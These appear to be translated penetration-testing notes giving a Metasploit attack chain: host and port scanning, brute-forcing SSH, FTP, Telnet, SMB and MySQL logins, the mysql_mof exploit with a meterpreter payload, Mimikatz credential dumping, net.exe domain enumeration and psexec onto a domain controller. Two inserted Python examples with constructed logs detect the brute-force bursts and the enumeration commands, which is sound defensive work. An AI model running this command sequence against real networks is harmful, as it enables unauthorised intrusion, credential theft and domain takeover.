Msf:
Messy notes recording the various msf modules for brute-forcing weak passwords
run post/windows/gather/arp_scanner RHOSTS=10.10.10.0/24    use the arp_scanner module to detect live hosts
Add a route in metasploit
route add 10.10.1.3 255.255.255.0 1
Use the port scanning module
use scanner/portscan/tcp
Brute-force SSH
Msf>use auxiliary/scanner/ssh/ssh_login
Brute-force FTP
Msf>use auxiliary/scanner/ftp/ftp_login
Brute-force Telnet
Msf>use auxiliary/scanner/telnet/telnet_login
Brute-force SMB
auxiliary/scanner/smb/smb_login
Brute-force MySQL
use scanner/mysql/mysql_login
msf auxiliary(scanner/mysql/mysql_login) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /root/passlist.txt
PASS_FILE => /root/passlist.txt
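Added example, not part of the original note: the log-side view of the password guessing the modules above perform. It parses OpenSSH auth.log lines and MySQL error-log lines, finds the densest window of failed logins per source IP, and flags a burst that is followed by a successful login. The sample lines, the year supplied for syslog timestamps, and the window and threshold values are all constructed assumptions.

```python
"""Added example (not from the original note): flag password-guessing bursts
against SSH and MySQL in authentication logs. All sample lines are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines: OpenSSH auth.log entries and MySQL error-log entries.
SAMPLE_LOG = """\
Mar 10 12:00:01 host sshd[1201]: Failed password for root from 10.10.1.50 port 40001 ssh2
Mar 10 12:00:02 host sshd[1202]: Failed password for root from 10.10.1.50 port 40002 ssh2
Mar 10 12:00:02 host sshd[1203]: Failed password for invalid user admin from 10.10.1.50 port 40003 ssh2
Mar 10 12:00:03 host sshd[1204]: Failed password for root from 10.10.1.50 port 40004 ssh2
Mar 10 12:00:04 host sshd[1205]: Failed password for root from 10.10.1.50 port 40005 ssh2
Mar 10 12:00:09 host sshd[1206]: Accepted password for root from 10.10.1.50 port 40006 ssh2
Mar 10 12:30:00 host sshd[1300]: Failed password for bob from 10.10.1.7 port 50001 ssh2
2024-03-10T12:05:00.000000Z 15 [Note] Access denied for user 'root'@'10.10.1.50' (using password: YES)
2024-03-10T12:05:01.000000Z 16 [Note] Access denied for user 'root'@'10.10.1.50' (using password: YES)
2024-03-10T12:05:01.000000Z 17 [Note] Access denied for user 'root'@'10.10.1.50' (using password: YES)
"""

SSH_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+)"
)
MYSQL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z \d+ \[\w+\] "
    r"Access denied for user '(?P<user>[^']+)'@'(?P<ip>[^']+)'"
)

WINDOW = timedelta(seconds=60)   # sliding window length (assumed tuning value)
THRESHOLD = 5                    # failures within one window that raise an alert


def parse_line(line, year=2024):
    """Normalise one log line to {service, ts, user, ip, ok} or None.
    Syslog timestamps carry no year, so the caller supplies one."""
    m = SSH_RE.match(line)
    if m:
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        return {"service": "ssh", "ts": ts, "user": m["user"], "ip": m["ip"],
                "ok": m["result"] == "Accepted"}
    m = MYSQL_RE.match(line)
    if m:
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
        return {"service": "mysql", "ts": ts, "user": m["user"], "ip": m["ip"], "ok": False}
    return None


def detect_bruteforce(log_text, threshold=THRESHOLD, window=WINDOW, year=2024):
    """Return one alert per (service, source IP) whose densest window of
    failures reaches the threshold; also note whether a success followed."""
    failures = defaultdict(list)   # (service, ip) -> [(ts, user), ...]
    successes = defaultdict(list)  # (service, ip) -> [ts, ...]
    for line in log_text.splitlines():
        ev = parse_line(line, year)
        if ev is None:
            continue
        key = (ev["service"], ev["ip"])
        if ev["ok"]:
            successes[key].append(ev["ts"])
        else:
            failures[key].append((ev["ts"], ev["user"]))

    alerts = []
    for key, fails in failures.items():
        fails.sort()
        # Two-pointer scan for the densest window of failures.
        best_count, best_start, j = 0, 0, 0
        for i in range(len(fails)):
            while fails[i][0] - fails[j][0] > window:
                j += 1
            if i - j + 1 > best_count:
                best_count, best_start = i - j + 1, j
        if best_count < threshold:
            continue
        burst = fails[best_start:best_start + best_count]
        burst_end = burst[-1][0]
        # A successful login shortly after the burst is the high-priority case.
        followed = any(burst_end <= s <= burst_end + window for s in successes.get(key, []))
        alerts.append({
            "service": key[0], "source": key[1], "failures": best_count,
            "users": sorted({u for _, u in burst}), "success_after_burst": followed,
        })
    return alerts


if __name__ == "__main__":
    for a in detect_bruteforce(SAMPLE_LOG):
        print(a)
```

With the constructed input only 10.10.1.50 against SSH crosses the threshold; the three MySQL failures stay below it and the single failure from 10.10.1.7 is ignored. Grouping by source rather than by username is what catches the ssh_login style of run, which cycles many usernames from one host.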
Use the mysql_mof module to obtain access
use windows/mysql/mysql_mof
msf exploit(windows/mysql/mysql_mof) > set PASSWORD 123456
PASSWORD => 123456
msf exploit(windows/mysql/mysql_mof) > set rhost 10.10.1.3
rhost => 10.10.1.3
msf exploit(windows/mysql/mysql_mof) > set USERNAME root
USERNAME => root
msf exploit(windows/mysql/mysql_mof) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/mysql/mysql_mof) > exploit
Export hashes with Mimikatz
meterpreter > load mimikatz
meterpreter > kerberos
Some in-domain commands
View domains
net view /domain
View computers in the current domain
net view
View computers in the CORP domain
net view /domain:CORP
Pinging a computer name gives its IP
ping Wangsong-PC
Get the list of all domain users
net user /domain
Get domain group information
net group /domain
Get the current domain admins
net group "domain admins" /domain
View the domain time and the name of the domain server
net time /domain
net time /domain also tells you the domain computer's name
WIN-723O786H6KU.moonsec.com 10.10.1.2    this is the domain controller
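Added example, not part of the original note: a detection for the net.exe domain reconnaissance commands listed above, run over process-creation telemetry. The records are constructed in the shape of Windows event 4688 / Sysmon event 1 exports; host names, users, and the "three distinct discovery commands" threshold are assumptions.

```python
"""Added example (not from the original note): flag the net.exe domain
reconnaissance commands listed above in process-creation telemetry.
All sample events are constructed."""
import re
from collections import defaultdict

# Constructed records in the shape of Windows event 4688 / Sysmon event 1 exports.
# net.exe hands most subcommands to net1.exe, so both images are covered.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\alice", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net view /domain"},
    {"host": "WS01", "user": "CORP\\alice", "image": r"C:\Windows\System32\net1.exe",
     "cmd": "C:\\Windows\\system32\\net1 user /domain"},
    {"host": "WS01", "user": "CORP\\alice", "image": r"C:\Windows\System32\net1.exe",
     "cmd": 'C:\\Windows\\system32\\net1 group "domain admins" /domain'},
    {"host": "WS01", "user": "CORP\\alice", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net time /domain"},
    # Benign net.exe use on another host: mapping a drive, listing one server.
    {"host": "WS02", "user": "CORP\\bob", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net use Z: \\\\fileserver\\share"},
    {"host": "WS02", "user": "CORP\\bob", "image": r"C:\Windows\System32\net.exe",
     "cmd": "net view \\\\fileserver"},
]

# Matches "net", "net1", "net.exe", "net1.exe", with or without a path prefix.
NET = r"\bnet(?:1)?(?:\.exe)?\s+"
DISCOVERY_PATTERNS = [
    ("domain_computers", re.compile(NET + r"view\s+/domain", re.I)),
    ("domain_users", re.compile(NET + r"user\s+/domain", re.I)),
    ("domain_admins", re.compile(NET + r'group\s+"?domain admins"?\s+/domain', re.I)),
    ("domain_groups", re.compile(NET + r"group\s+/domain", re.I)),
    ("domain_time", re.compile(NET + r"time\s+/domain", re.I)),
]


def classify(cmdline):
    """Discovery tags matched by one command line (empty list if none)."""
    return [tag for tag, rx in DISCOVERY_PATTERNS if rx.search(cmdline)]


def discovery_by_host(events, min_tags=3):
    """Hosts on which at least min_tags distinct discovery commands were seen.
    A single 'net view' is noise; several different ones from one host is
    the enumeration sequence from the note."""
    seen = defaultdict(set)
    for ev in events:
        for tag in classify(ev["cmd"]):
            seen[ev["host"]].add(tag)
    return {host: sorted(tags) for host, tags in seen.items() if len(tags) >= min_tags}


if __name__ == "__main__":
    for host, tags in discovery_by_host(SAMPLE_EVENTS).items():
        print(host, tags)
```

Only WS01 is reported; WS02's drive mapping and single-server listing match nothing. Matching on the command line rather than the image name is deliberate, since the same subcommands show up under net1.exe.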
Get a shell on the domain controller with psexec
msf exploit(windows/smb/psexec) > set RHOST 10.10.1.2
RHOST => 10.10.1.2
msf exploit(windows/smb/psexec) > set SMBDomain moonsec
SMBDomain => moonsec
msf exploit(windows/smb/psexec) > set SMBUser administrator
SMBUser => administrator
msf exploit(windows/smb/psexec) > set SMBPass xxx123456..
SMBPass => xxx123456..
msf exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf exploit(windows/smb/psexec) > exploit